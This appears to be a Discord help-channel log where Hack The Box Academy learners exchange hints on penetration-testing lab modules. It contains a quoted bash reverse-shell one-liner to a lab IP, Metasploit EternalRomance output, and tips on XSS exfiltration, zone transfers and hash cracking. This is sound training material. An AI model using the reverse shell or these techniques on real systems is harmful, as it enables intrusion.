#modules

it goes over it..

there's a section about authentication mechanisms that talks about it

I read this like 10 times and didn't know what they meant: When using Windows Authentication, we need to specify the domain name or the hostname of the target machine. If we don't specify a domain or hostname, it will assume SQL Authentication and authenticate against the users created in the SQL Server. Instead, if we define the domain or hostname, it will use Windows Authentication. If we are targetting a local account, we can use SERVERNAME\accountname or .\accountname. The full command would look like:

that makes sense to me

let's switch brains please

makes sense to me too T-T

are u still confused?

think about it this way, one is windows auth which is the same account you use to log into your windows computer. the other one is a login for a service, sql, which is separate from your windows logon because it's provided by the service

just like your discord login is different than your windows login

but you can setup sql to auth to your windows account instead of the sql server account

that makes sense, i just didn't realize there was a flag you could use to specify

now go get that flag

i really hope so, i've been on this module all day

got the flag, like three hours longer than i would have liked due to the windows auth fiasco

but now you'll never forget

SQLMap Essentials -skill assessment i need help with this i already got the attack vector and bypass the filter and managed to see two databases but cannt continue to FLAG

NVM there was a typo in the FLAG db

Hi everyone,

I am doing the "Phishing" section of "Cross Site Scripting" module:https://academy.hackthebox.com/module/103/section/984

When I use the exact same payload as shown in the reading material, I get slightly different rendering. So, I changed the payload a bit and added <script> to it so that the end rendering looks like (see attached). I have webserver running on my end and and I have also tried sending test values. I do receive these values on my end. However, when I pass this URL to the send.php, all I get is Issue in sending URL. I am not sure what I am doing wrong 😦

Do t0 modules give back the cubes that are spent.

Yes

What bout t1

20%

So if the module cost 100c. I will get 20c back

?

Yes

It's 20% for all non t0 modules

Hy guys, i am currently working through password attacks and i am stuck on hard lab, so here is the situation. I got SAM and SYSTEM files, so i extracted hashes but the problem is that multiple rows have same has, so i tried to crack the has and i got blank. So I tried to insert it directly, it didn't work and i also tried mulitple PtH tecniques and none work, can someone help?

Look at the HTML source code and think about where exactly you are injecting your payload.

Do you have the right files? Have a look to see if there are any others

I know. Its in image src attribute. But I got everything right. I also checked the hint and it says to test the login form that we inject beforehand. And it works. But why does send.php give me error?

I am pretty sure, i downloaded Backup drive, mounted it, extracted SAM and SYSTEM files, used samdump2 do dump hashes, and got blank hash that doesn't work when trying to pass the hash

will you still get a cookie? If so, the error message doesn't have to bother you. If not, your ePayload is not yet correct.

Look at the number of backups

No. Wait, shouldn't I be getting username and password? Or just a single cookie?

username and pass

So as not to spoil anything, send me a DM

i used netcat to catch it

Sure

just did this 10 mins ago

did you add a url parameter?

What do you mean? I get only one backup file that i mount

Oh, I probably mixed it up. This is the task with the vhd file, right? Yes, then there is only one file.

Thank you so much, it worked

Footprinting is taking me way too long to finish

hey guys, could anyone please hint me with this one? I'm stuck

okay disregard, I just had to write the change I've made in hexadecimal

This is a good one lol

Hello i got problem with Network Enumeration with Nmap/Host and Port Scanning someone help?

I submitted the flag "case-sensitive" but doesn't accept it

Have a bug report in #1234357888114364508 about exactly that.

thanks a lot

Hello in still new where can I chat general is closed I can talk there

Read and follow #welcome

What's this server for

academy

lmfao what’s that from?

Again, read #welcome Everything will be explained to you there

Ohh thx

Hi im working on Network Enumeration with Nmap/ **Firewall and IDS/IPS Evasion - Hard Lab ** On my Own i know that for bypass IDS/IPS know to scan the target lowest, i used -T0 and -T1 flag for find this services version, but nmap dubug mode said me about 8 hours to complete lol, any tips?

-T4

-T4 is not intrusive?

Pretty aggressive but it will sped up a lot

clear

I recommend using -T4 when scanning reasonably modern and reliable networks. Keep that option (at the beginning of the command...

-T4 prohibits the dynamic scan delay from exceeding 10 ms for TCP ports and -T5 caps that value at 5 ms.

So you need a real fast connection to use -T4

clear , what i'm wrong?

T0 is the slowest scan, also referred to as the "Paranoid" scan. This option is good for IDS evasion

If u rlly paranoid

yeah i know about these flags but took me 8 hours

i just stuck on this

read module again

Cause its slow

there should be a script or some flag that enum hostname

But if u know its ssh

Just use -p 22

i dont need to enum hostname

With -sC

How can I access rockyou

On pwnbox

Seclist

Check /opt for seclist

@hexed tartan what the question

||Now our client wants to know if it is possible to find out the version of the running services. Identify the version of service our client was talking about and submit the flag as the answer. ||

-sV

i did lol

the question, not a hint

This is the question bro

.

/usr/share/wordlists/seclists

But I cant access

but -sV is the answer

/usr/share/wordlists/rockyou.txt

if there is smb service, than you should use some script I believe

Rockyou is in a zip

gunzip rockyou.txt.gz

the machine is "Hard" so i can expect everything lol

Permission denied

sudo

i already used -p- for scan all ports

only found are 22 80

Nmap hard lab

?

yes

Its 3:04 am that's why I'm acting dumb

I thought I had sudo

np i m more than u

Utilize some of the scan techniques referred to in the "ids/ips" evasion reading, substituting the specific port for all ports

i tried some databases port like 3306 this way i was looking for

might be redis? idk im trying

btw which hash is this 93c887ae8200000052f17511d0fd3b9a08350b045e118a2cd0c311777576080bc13a5581d522cdb5a123456789abcdefa123456789abcdef140561646d696e:3541221bac8d7e76f34e45697aed40edfbe87fd8

what does it belong to

Our client also mentioned that they were forced to add a service that plays a vital role for their customer because they require large amounts of data. --> only thing that come in my mind is a service database port

Nope, don't look for specific ports on your own

Ignore specific ports

Just scan for all ports using some of the techniques referred to

What academy module is this related to?

Arent using -T1 make it slow af

It is. I wouldn't recommend T1 but there's a technique from the reading that will reveal the right port

is the labs the module scan specific ports thats why but ok i'm going for -p- instead of

Hmmm, ok²

In the instances of specific ports it's mostly for direct demonstration instead of loads of nonhelpful info

footprinting

BMC

section

i got it

BMC???? That doesn't sound familiar

hmac sha1

You mean ipmi?

yea mb

The section tells you what mode to use

And even if you search example hashes in hashcat for ipmi you'll find it

yea i cracked it

Hey guys I'm just getting to know tech and I will be interested to go into cyber security please where can I start from so I get good starting knowledge

but i just wanted to find which algorithm it was from

if i use -A i'm ripped

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

i didnt read the outpuit properly

Don't use -A then

Yeahhh that happens

yeah xD

gosh is the second alert lol

i tried using crackstation first but dint get anything

You can likely reset the target and it'll be faster than waiting the timer

ok thanks

But look at all the techniques specifically from the section prior to the skill exam

Please any help

i tried decoy, probably is filtered this port idk i'm looking for syn scan filtered port

@coral trout

Are the skill assessments enough to pass the exam?

Or u need to do extra boxes as well

If you have understood all the attacks discussed in the modules and know why they work the way they do, then you are ready for the exam.
Otherwise, it may be useful to read through individual topics again or try them out in machines

Thanks

DONE finally

idk why decoy doesnt work i used --disable-arp-ping too

and worked

he found the filtered

Hey in the web attack skill assesment i found a uid for administrator can i modify the request to be administratr from htb student account that i am now in

I dont knw how to get the token for administrator so that i can modify a get reqyest to kinda get to administrator panel

When you log in as a user, take a look at how exactly this user gets the token.

Got it changed uid in storage and vola i was stuck here for some time

hehe yes

I got that many, many times

Attacking Common Services > DNS
||I see the subdomain containing the flag does not allow queries. It only allows zone transfers. Can you even capture this flag with subbrute or dnsenum in this lab? DM's are open if discussing in public is a spoiler minefield.||

Okay, I need a little bit of help now. I have been trying to do the 'Metasploit Fundamentals' module, and I am stuck on the 'Modules' section. I have been working on this for days, I have set the appropriate RHOST, the RPORT is correct, I was doing it on a VM, so i figured maybe my metasploit was messed up.

I have updated it, uninstalled and reinstalled, reloaded from VM snapshot. I have tried using the eternal romance and eternalblue exploits. And yes, I was setting LHOST to tun0. I have cancelled and rerun openvpn many times, I have installed new files, I have used different servers, I have terminated and respawned the target (and yes, I changed RHOST when I respawned the target.)

Eventually I gave up on using my VM and tried to do it via pwnbox instead, figuring that I can figure out what the difference is between the two later. Pwnbox did not work either. I left my LPORT and LHOST as default because the pwnbox doesn't use a vpn. I have the right RHOST. I have tried different LPORTS and I know that the EternalRomance exploit can be a bit finnicky, so I have repeated it in case of connection issues. If I am lucky, I get the following output:

' Started reverse TCP handler on 94.237.50.148:4444
[] 10.129.179.36:445 - Target OS: Windows Server 2016 Standard 14393
[] 10.129.179.36:445 - Built a write-what-where primitive...
[+] 10.129.179.36:445 - Overwrite complete... SYSTEM session obtained!
[] 10.129.179.36:445 - Selecting PowerShell target
[] 10.129.179.36:445 - Executing the payload...
[+] 10.129.179.36:445 - Service start timed out, OK if running a command or non-service executable...
[*] Exploit completed, but no session was created. '

I have tried doing this independantly, I have tried looking up people experiencing the same issue, and I have even tried doing it via HTB's Pwnbox, and nothing works, I would greatly appreciate some help.

When i login into htb server using ssh

The terminal is so laggy

try to change vpn

I actually don't have any notes from that module. Is there another similar exploit down the list? I remember encountering this and the solution was to move onto another similar exploit. One doesn't work, the next does.

Should i be using tcp or udp?

I am using us academy 6 rm

It has low load

HI i need help with Module Attacking Common Applications Part osTicket I don't fully understand where to go after I looked at the ticket I created
i find llfreight@access1! but don`t work

if it alredy has low latency, i don't know so

There is an auxilary module, however I think it just checks if it is vulnerable or maybe reads files, I believe you need a full on reverse shell to get the flag without yards of guesswork

How many hrs a day should I do htb A to finish cbbh im 8 months pls reply or @ as I'm going to sleep rn

Give me like 20 minutes and I'll fire up the module to take a look; see if I can figure it out again and give you a sanity check.

Thank you so much! I really have tried to troubleshoot and sort it myself, I know that I'll never learn anything if I always ask others for the answers, but a week later and so many attempts, and even defaulting to the pwnbox which doesn't work, I can cop to needing some help

Look for the ticket that they refer to after you successfully log in

this?

There's a search feature

You have to sign in though

As noted by the message above

From the sample output with the 2 users and passwords one of them should work

Hey i chNged the password for admin using a burp get request in skill assesment section of web attacks but i dont see any change in tha main webpage

You logged in to the admin account?

Yup

Yes, I did everything. It's just that I used too many wrong attempts, I needed to change the IP. Ty

I chNged the uid in memmry and shows me as administrator in the main page

There should be an add event button or something like that on the admin page

Noo

Not seeing any changes in the page even after i changed the administration password

Like I said though you need to log in

Not change your uid

Ohhh

Darn

You changed the password so just... log in? Lol

Yes you are right i never thought

How's life in these parts of the server?

I was stuck somewhere else in my mind

My logical thinking sucks

same

So yea this is pretty straight forward for me. If you want to share output from SHOW OPTIONS I can look for anything unusual in your setup. It's really as you describe: set RHOST set LHOST and go. I used the psexec variant.

DM's open, that might be easier than dumping screen shots in main

Wait... I think I see the problem...

Started reverse TCP handler on 94.XXX.XX.XXX:4444
This is definitely not tun0 if you're on the VPN. Somehow you're opening a reverse connection on a public IP? Whoops?

I'm... uh... guessing she went offline lol.

Nooo i can't check for my CV

what module is this?

docker OP 🙏

footprinting

ah sorry, not done it

no but was a joke ahha

because says "hr"

bro really said trust me bro

Hi, sorry, I was having a meal, DM sent

real but can't expect people here to know how to use docker

shut your trap buddy unless you want some of these

Okay, for anyone looking for help on this issue, here is what I managed to do on my VM to make the shell work. Truth be told I do not know which of these changes resulted in my eventual success but here are the changes I made that must have helped me succeed.

First, I redownloaded the VPN Connection file, however I downloaded it from a lower load server, and I downloaded the TCP file instead of the UDP to help in case of packet loss.

I then terminated the target machine and spun it up again.

Lastly, I reconfigured my metasploit console, I changed the payload from the default Windows payload to a generic payload, because this was the message I noticed after restarting msfconsole

No payload configured, defaulting to windows/meterpreter/reverse_tcp

I then used the show payloads command, and decided to use payload 4

payload/generic/shell_reverse_tcp

Finally, I set my LHOST to tun0 again, for the new VPN file, set RHOSTS to the new target machine, and ran it with success. Good luck!

whats happened here?

solved i insert payload.com lol

Hi everyone, i'm doing the introduction of Windows events logging basic (windows event logs). The exercise consists in founding the event with ID 4624 that took place on 8/3/2022 at 10:23:25. The answer should be the name of the executable responsible for the modification of the auditing settings. I found in the event details only the reference to "services.exe". Therefore, the answer's pattern should be "TW__.exe"

Any suggestions?

did HTB removed the Intro to AD module?

Nay: https://academy.hackthebox.com/module/details/74

thanks mate i got it

Module Attacking Common Applications (Attacking Thick Client Applications) i can`t find 0000000000003000MAP-RW--

Did you set the exit breakpoint before running the application

in preferences yep

... I hate to break it to you

That's entry breakpoint... not exit breakpoint

I looked at the photo 5 times in the module. 🫣 Ty

https://tenor.com/view/asdf-asdfmovie-i-can't-read-i-cant-read-punished-lion-gif-3532527054645921660

As a word of warning, the thick client section sucks. Suggest to use the writeup for 'Fatty' to struggle through it

ok 🫡

I did not. I regretted it

@fathom pendant hey man would you humor me with an embarassing question... im trying to understand why redirecrts are used twice on cmds like bash -i >& /dev/tcp/10.10.10.99/1337 0>&1 chatgpt/c.ai no help

both ai's gave me opposing answers of course

Overall module, great- fantastic even. Thick Client section and the third skill assessment

and further when you should use two and when you should not? i guess that will be apparent when i better understand it?

Bump. I'm still trying to figure out if I learned anything of value from this exercise. I can't imagine this scenario in the real world, but if anyone who completed this lab has wisdom to share please do.

Think about it this way: you're more or less defining where the file descriptors are being sent

i think you need to do a dig axfr

@Quoit ^

0: stdin
1: stdout
2: stderr

Thanks, I did get the flag. I just don't know if I should revise my procedures or not. This seems like a really artificial scenario.

https://www.gnu.org/software/bash/manual/html_node/Redirections.html

if you like PM me your solution and i'll tell you if its how i solved it, i just did this one a week ago or so

Sure, thanks ok.

so i get this part, but i dont understand the placement... is there any importance to it? why not just do them all at the end? does that matter? i just dont get why its there twice?

Sometimes you'll find interesting info sitting on txt records bc laziness, or even subdomains you otherwise wouldn't have thought to look for

you're redirecting first, stdout and stderr (to?? stdout?) then redirecting stdout and stderr to dev/null/... which would supercede stdout?

because the redirect isnt parsed until after the cmds are executed?

dnsenum does some voodoo magic to get the result

Sure, in this case queries are completely disabled for that sumdomain. Whereas dnsenum would normally be my go-to tool it skips the subdomain in question as a result.

In the last one, according to the manual is redirecting all 3 to stdout

So that it displays stuff in output

in output and /dev/null? this is seriously confusing ill look at the manual but i remember reading it previously maybe it will make more sense now

You need the right wordlist

No

Question, am I allowed to add htb academy work to my website portfolio

oh god i get it now

What do you mean by that?

Like screen shotting me working with certain tools and such and speaking about it on website/github

Part of HTB content guidelines doesn't allow posting of academy content for modules t1 or higher

see this has been the bane of my existence... these redirect operators they work opposite when nothing is next to them, if i remember correctly (and understand what i just read in the manual) ... this always fucks with me

Ohkay ty

`Note that the order of redirections is significant. For example, the command

ls > dirlist 2>&1
directs both standard output (file descriptor 1) and standard error (file descriptor 2) to the file dirlist, while the command`

am i understanding that correctly? maybe that has nothing to do with what im talking about

3.6.8 duplicating file descriptors

ah, you da man

seems like i need to re-read this whole thing i prob got glazed over and didnt finish the chapter

It's duplicating the file descriptors to the tcp connection

The "file" in this instance is the tcp connection /dev/tcp/ip/port

Soft reminder everything in linux is a file

ok that makes sense

reading the example part in that subsection you just mentioned... jesus... they're redirecting errors from files used as stdin and using it in the example explanation...? how can a file have errors, and we're talking exit code errors here right? or those plus any other errors?

or is it redirecting errors made when running the cmd from a file used as stdin? i just dont why wouldnt you redirect that to errors to stdout in that case... this makes little to no sense

nvm

i need to re-read this whole thing, again, then re-read it again

Because technically without any redirection, you're not gonna get feedback on your command

but i do feel like i understand what i need to, at the moment.

And it will error without you knowing

gotcha, this has been illuminating

As long as it's tier 0 content you're fine

Can I used the pawn box to access certain applications?

To post content?

i freaking get it now, fingers crossed i dont forget.

Elaborate

Anyone did the TLS/SSL attack module on CWEE path
I am getting this error when trying the Heartbleed section. basically, any lab using the TLS-Breaker tool

This is the error I am getting

Check jdk version

I think it works with jdk-11

Yo

java -version openjdk version "17.0.11" 2024-04-16 OpenJDK Runtime Environment (build 17.0.11+9-Debian-1deb12u1) OpenJDK 64-Bit Server VM (build 17.0.11+9-Debian-1deb12u1, mixed mode, sharing)

Let me install in Pwnbox if it allows

Yeah , you are correct
running using java11 solved the issue
Java-11 executable is at /usr/lib/jvm/java-11-openjdk-amd64/bin/java
It is already installed

Is academy referral links works if I invited a friend who already had an academy account and bought sub?

Or only for new new members

Hello, I'm working on the phishing section of the XSS module. Everything works perfectly, except when I try to send the URL through send.php. It tells me that there was an issue sending the URL. I've tried several different ways; could the module be malfunctioning?

Hello i stuck on this Information Gathering web edition/Virtual Host, i found 2 subdomains using gobuster after i add to the host all subdomains found i tried to found other one, but i couldnt find anything some help?

did you add the ip/domain to hosts file?

Only for new users

yes

hang on. send that screenshot again. you don’t need separate lines for subdomains

In DMs please.

yeah DM me

waiting for help thanks 🙏🏻

I believe @hushed sail wants to help, g0b said to take it to DM

yep i write him but is offline actually <.<

i forgot i have DM requests turned on. my bad friend

Discord doesn't notify for dm requests generally

@fathom pendant do you know why it shows me no password hash loaded? i have changed the format but it always shows me no password hash loaded

This doesn't look like an academy module related question

It's likely though bc the hash itself is what's before the : so john isn't recognizing it

how to crack it if i have a hash and the salt? @fathom pendant

what academy module is it related to and have you tried GPT and google? ¯_(ツ)_/¯

some of the content/wording in the modules is...interesting. In the intro to Linux package management section they mention installing 'git', then talk about impacket for a few paragraphs, then say 'now that git is installed...' o_0

Hello everyone can anyone help me pls

module:Using Web Proxies
skills assesment

Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)

I did everything but didnt work

step 1: make sure the cookie is selected to be replaced
step 2: in the payload options, add prefix then paste the 31 character hash you found
step 3: in payload options re-encode the cookie in the reverse order you decoded it in

Hello I am on kernel exploits, linuxprivesc. pls help

Hello. Is anyone available to give me a hint in the Skills assessment of the 'Advanced XSS and CSRF'? Stuck on the file upload. Tried multiple extensions and even changed the Content type

For Windows Privilege Escalation/Citrix Env Breakout
How do I exit full screen from the Citrix environment. I am stuck, not being able to transfer the tools required for privesc

did you mean I have to set base64-encode in payload proccesing

yes

all the steps i stated are in the payload processing part

adding prefix, and re-encoding

remember to get to that 31 character almost hash -- you decoded twice

so you have to re-encode it in the reverse order

why i cannot send image

i want to show

because your account isn't linked

but i told you all that you need to know

Had to go fullscreen into Remmina to see the drop-down menu

Nvm that's remmina's drop down. How do I exit this citrix environment to the host...

I did but not worked

I add last character ....79a17a§a§ then I added "alphanum-case.txt" in payload settins

then I add prefix I which I found hash then I added base64-encode

but not worked

because in that case you're only just messing with the last character...

you need to use the whole cookie value

because again; the cookie needs to be in the format you found it in

before decoding

I have to use full hash ?

yes

shells and payloads skill assesment host 1

found both upload points

on the one although it uploads the .aspx i cant access it afterwards by bowsing on the upload configuration path the same way as described on the module

On the other i cant upload the war file and i get a 403 error cause "Manager is only accessible from a browser running on the same machine as Tomcat"

Found some writeups that didnt encounter any of these any idea what might cause these problems?

can someone please help?

why not just upload a .war file?

Thats what i am trying to do and i get the error

did you sign into the Tomcat Manger from the web?

yes

then you should be able to upload it directly from the manager page

¯_(ツ)_/¯

no fancy crazy nonsense

I know but i am not ...

i don't recall ever encountering that 403 error

i just rememeber generating the war file with msfvenom --> logging in --> uploading

ATTACKING COMMON SERVICES/Attacking DNS. I keep waiting for one module that doesn't get me stuck. I can't find any DNS records for inlanefreight.htb, been at it for two hours now. I found 6 records using subbrute for inlanefreight.COM but nothing for .htb, i am lost. Dig doesn't work. Dig AXFR doesn't work. Subbrute doesn't work.

you need to specify the nameserver with @spawned_ip

because .htb isn't a valid tld, without specifying it's trying to query public nameservers to find it

inlanefreight.com on the otherhand is a publicly hosted website

so public nameservers can find it without needing to specify it

like this?? dig AXFR @10.129.217.140 inlanefreight.htb

yeah i think that works, try it

dig AXFR @10.129.217.140 inlanefreight.htb

; <<>> DiG 9.18.24-1-Debian <<>> AXFR @10.129.217.140 inlanefreight.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.

nope

i just ran the same exact command worked no problem

make sure you specify the correct name server IP

is that not the spawned target ip?

also make sure you don't have anything in your /etc/hosts related to inlanefreight.htb

it is, the target you spawn is the name server for this lab

whatever the IP is that popped up when you spawned the target IP

still not working: dig AXFR @10.129.217.140 inlanefreight.htb
nothing regarding inlanefreight.htb in /etc/hosts file, and verified this ip is the spawned target IP

try restarting the target

ok

also you seem to have an old version of dig, maybe update your box

i'm using 9.20.1-1-debian

if he's using parrot that's the latest on parrot

using parrot pwnbox, restarted target box and instance: dig AXFR @10.129.237.204 inlanefreight.htb

; <<>> DiG 9.18.24-1-Debian <<>> AXFR @10.129.237.204 inlanefreight.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.

@fathom pendant sorry for tagging you directly but do you have any idea about how to fix this error?

does your /etc/hosts file have anything inlanefreight.htb in it?

haven't done that section

but it looks like you compiled it with the wrong GLIB_C

if you compiled it on your system, it used your system's glibc

no it does not, i'd paste a screenshot if i could

oh ok. I will try to compile it directly on the target then. thanks

either way weird that it's not doing the axfr

are you using the provided attack box or your own vm?

provided attack box

.

i'm assuming you're not also weirdly running the vpn on your own machine

correct

maybe try terminating the attack box, doing a hard refresh on the website, re-spawning the target after the hard refresh, start up the pwnbox, and try again

what wordlist did you use?

i found it in 5 seconds

the dig command doesn't use a wordlist

he said he didnt find any subdomains with subbrute

its just an axfr request

i used this command when i used subbrute: python3 subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers.txt

but let me try hard restarting the pwnbox now

did you add the target ip in the resolver file?

and only the target ip

let's tackle this one step at a time

❤️

the first issue being: the base axfr not going through in the first place

when it absolutely should

the subbrute doesn't come in until the end

mine didnt either

only worked on the subdomain

no, it works on the base domain

i just did it with the exact command he's running

hmm

shut down the browser, hard reset everything, just spawned: dig AXFR @10.129.185.250 inlanefreight.htb

; <<>> DiG 9.18.24-1-Debian <<>> AXFR @10.129.185.250 inlanefreight.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.

can you switch regions with the pwnbox?

i always use the vpn, i think downloading a vpn file in a region will change the lab region? not sure marcielee probably knows though

i could terminate the pwnbox and change location, should i try UK or something?

¯_(ツ)_/¯

i don't use the pwnbox often

only when i'm lazy/don't already have my vm running

i guess i need to just take the time to download a vm on my desktop, cause this has been so time consuming as of late

tbh it's a much better experience

im confused why its not working for me either

i just spawned the pwnbox and tried, works fine

glad i'm not the only one haha misery loves company

i'm on eu academy 4 apparently

i wonder if they fixed the us servers yet

i'm going to try the uk first, then i guess set up a vm if it doens't work

US-academy-2 seems a bit laggy atm or at least slow(ish) on spawning

tried CA and UK with no luck

wait are you doing footprinting/dns or commonservices/dns

subbrute is the way to go though

lmao

thats what im saying

that lmao makes me think he spawned footprinting

not common services

ATTACKING COMMON SERVICES

but yeah remove all entries in the resolvers.txt

and just put in the IP

oops

i was doing footprinting

ik where you're at

i was talking about the other braincell helping

yeah just remove and make a new resolvers file with the target ip

yeah it's intentional to not be able to axfr the base domain

but you can axfr to the domain discovered via subbrute

it worked when I compiled it on the target. thanks

wait, so should i not be worrying about the dig axfr not working?

not on the base domain

If student subscription about to end and I'm half way in a module, will the module lock when the sub end? , If so, will it lock at the same day the sub ends ?

find other subdomains first

using subbrute right?

yeah the same command u were running before

just have the target ip the only entry in resolvers.txt

ok trying very soon

doing this echo "10.129.9.221" > ./resolvers.txt

Same module I brought up earlier. Attacking common services > DNS

It's a silly, synthetic scenario IMO.

it's possible to encounter

so i wouldn't discount it

Bind is configured to disallow querying, but allow axfr.

In my experience, dnsenum and subbrute alone won't do it. He's on the right path using axfr tho.

python3 subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers.txt

The result here is that the end point in question will not respond to anything, but you can axfr the records inside. It's just setup to be a trick.

the command is getting stuck after revealing inlanefreight.htb

in this section specifically subbrute is the way to go

misconfigurations happen

it's not getting stuck

wait

it's going through the names.txt list

If you tell me how to get the flag with subbrute I'd very much appreciate it.

just be patient

oh wait i'm just not patient

subbrute gives you a subdomain you can transfer to

it's as shrimple as that

how long do i wait? until it's done?

what subbrute does is basically fuzzing, i haven't dove into the source code to be entirely sure

i'd say once it starts giving you some output, you're on the right track

just try to zone transfer the domains while its running

try each domain in another terminal while you wait

smart

https://tenor.com/view/modern-problems-solutions-dave-chapelle-gif-13450651

got the flag ❤️ ❤️ ❤️

gz ez

my main problem was not putting the target ip in this line echo "ns1.inlanefreight.com" > ./resolvers.txt

yeah the ns for inlanefreight.com won't do shit for inlanefreight.htb

they are separate domains entirely

so but how was i supposed to know to put the target ip there?

think of resolvers.txt as a pseudo hosts file

if you don't know the nameserver, it doesn't hurt to use the ip

thats the only name server

Now that you have the answer you can also ||ssh into the box and take a peek in /etc/bind|| 😆

dude

you're hardstuck on the bind thing

https://tenor.com/view/it-aint-that-serious-fam-jared-dines-nothing-serious-no-big-deal-not-very-serious-gif-18400105

i have no energy to do this atm

no need to... but if you did you can find the flag there too.

i mean an alternative i believe is doing an nslookup for it nslookup inlanefreight.htb spawn_ip

then put that nameserver in your hosts file and use that in the resolvers file

¯_(ツ)_/¯

but it's 100% doable with subbrute as shown just now

not to mention you won't always have access to the box that's running the configuration

nslookup inlanefreight.htb 10.129.9.221
Server: 10.129.9.221
Address: 10.129.9.221#53

*** Can't find inlanefreight.htb: No answer

so knowing how the tool works

Wait, is it? You still had to dig axfr the subdomain, didn't you @novel lynx

this will basically tell you the NS is the ip

yeah i didn't say you didn't have to dig it

yes i did

i didn't say subbrute was the only solution

it just gets you to the answer

Oh ok, misread

it bruteforces a list of words to test for subdomains on a server

can't be bothered to dive into the source code to see what it actually does under the hood

ya i guess i need to start inspecting tool documentation more often

sub[domain]brute[force]

thanks for the help though everyone! it has been one rabbit hole after another for me lately

Happy hacking!

"Happy"

"hacking"

I'll race you through SMTP now 🤓

gotta go to the gym, but i'll be back at it later tonight ❤️

💀

no

what module @median gale

The passwords don't change every spawn

There's only one valid login for the users

password attacks

hydra just printed 4 ones

And each service has a unique user

for one user

which part

Then you're doing something wrong :p

Network Services

What could have i possible done wrong changed the ip, and gave the username.list from the resaurces

Either way try avoiding posting screenshots since the module is not t0

I don't recall hydra giving false positives though

🤦‍♂️

Please stop pasting screenshots with outputs like that

Try changing vpn regions

Hey all, I'm still learning I'm on "Learn the basics of Penetration Testin" Tier 1, but a box gicing me a headache. Is it okay to ask it here?

its spoiler free

That doesn't sound like an academy module

If it was spoiler free, it wouldn't have been removed

It's a module > t0

It is LAB yea, the "Three"

Try with nxc instead of hydra, see if the results are the same

#starting-point read and follow #welcome to access

welp, need my indentifier find first lmao

This channel is for the learning modules on https://academy.hackthebox.com

Your identifier is on your account settings page

It's not emailed or delivered to you in any form

The screenshot showcases hydra giving false positives how could this be against any tos?

Sorry for it. 😅 found it

I am stuck at Skill Assestment II - Deserialization Attacks, any hints?

Try changing vpn regions, respawning the target, and trying again

im trying rn but might take a while cause this module likes to take long on purpose

@median gale i got it

u shouldn't need the user.list if you check who has rdp permissions with winrm

Eh that's not really taught in this module

And the expected way is via bruteforce

Hi guys, I'm really really stuck at Skill Assessment - Advanced XSS and CSRF Exploitation , any advice? I was able to get the moderator upgrade but I can't make anything work from that point

oh yeah

Though creating a userlist from C:/users/ isn't a bad idea

I believe that's what I did and started deleting from the new list

Tried europe's 3,4 and 6 and i keep getting destination unreachable. Can only connect with Europe 2

You'll need to respawn the target after changing vpn region

It respawns automatically

I don't ever trust that

I always manually reset it to be sure

How do you do that?

but even then the user i get with hydra is always the same his passwrod varies and is never one

well getting a different role means the new role may have new privileges you didn't have before

Hard restart didnt change anything

i did net localgroup > net localgroup "Remote Desktop Users"

u can just use the wordlists tho

if he's continuously getting false positives something is telling me it's something up with the environment being spawned for him

You did these where ? Not sure i understand

winrm

with the user you have winrm for

yeah probably

LOL sharing flags is definitely a nogo

How will i proceed?

😭

i just told you how

the module is a writeup

yeah

it's the environment spawning for him

i'm not getting any false positives running hydra on a spawned target for me

US-2

Oh yeah yeah I know, I'm able to access to task.php and send a script from that point, since it has CSP I assume that I need to upload a file using the file upload functionality, then call it from tasks.php as it should bypass the CSP since it will be a script within the app, but is not working... NOTHING is working

also try terminating then restarting the target to ensure no weird backend shenanigans

i know the username, what i dont know is the password

wym

i also found it funny that doing this, i actually got "potentially valid account but not active for rdp" for the previous users

Yes shame

user name to rdp or winrm?

yep did it twice and got the expected result

no weird false positives

so it's 100% the spawn environment being broken for you

it's weird that when you change vpn regions and respawn the target though it doesn't let you try and connect

but like i said you may need to Terminate, then restart

not using the restart button

Has happened to other modules as well when i tried to get a faster connection

you on the pwnbox?

to rdp

oh yeah changing the vpn region when using the pwnbox is annoying

no running local

then use the password list with the user

also when you changed vpn region, did you redownload the vpn pack?

thats exactly what i do

yes

And you stopped and restarted the vpn with the new pack

ctrl c, new file with openvpn

I'd reach out to support then

¯_(ツ)_/¯

Send the screenshots

Like I said it worked fine for me on my own machine on us academy 2

Let my try us 2

me*

sounds like you need to review your code then

no

🙌 okay thanks for the hint then! I was expecting this reply/confirmation... fuck

Terminate then start?

well you can exfil to the exfil server

Also not being able to ping isn't always a sign that it's not working

Generally by default Windows blocks ICMP echo requests

This box doesnt though

I can't reach exfil, I tried with lot of things but in burp it seems the request is flying out, even with the dev tools I can see it within the network tab but I don't have any new log on exfil.htb/log even with burp collab,

Did you get any error when trying to run hydra against it?

Yes it runs prints couple of false postives and then becaume unreachable

Interesting

Reach out to website support then

Green bubble on academy

maybe i'm confused how far you are then. i thought you said you had moderator status.

try "sudo killall openvpn" and start the vpn again

thats what i usually use to stop it

Seems like and overkill

It's to ensure no weird rogue openvpn processes are running

Which may be clogging your routes

`Yeah sorry I'm not a native speaker, emm I did the open redirect + CSRF to get the moderator upgrade.

Then I got the access to write on the task.php, since it has CSP I can't send anything out but using the open redirect it may work (I tried it and nope), hence I decided to use the file upload funcitonality to store the XMLHttpRequest script/request there to be called from task.php.

This is what I tried, lot of different ways to write the sames scripts. Same ideas, get admin.php content with GET request and send it with a POST to exfil, nothing it's working

that's why i said it's probably something with your code

you should probably delete your msgs though its giving a lot away

Hello.
Can I have some help please for the "Active Directory Enumeration & Attacks" module ?

I'm performing the "Attacking Domain Trusts - Child -> Parent Trusts - from Linux" and i'm stuck to answer the question.

Thanks

which question there are 3.. maybe say what you're stuck on

No it's the linux part there is only one

ahh yeah i see

i was looking at cross trusts

they give a one liner that does it all

Yes but I was trying on my own

that's the one where you gotta raise the child yeah?

to do it from your machine instead of the parrot machine that's on the network you'll need to pivot through the network afaik

it's pretty step by step

unless i'm fully misremembering

either way works, i did it without pivoting

thanks it worked I was making a stupid mistake... I'm good with HTB for today I think 😅

hello

you should delete those pics as it's a t1 module

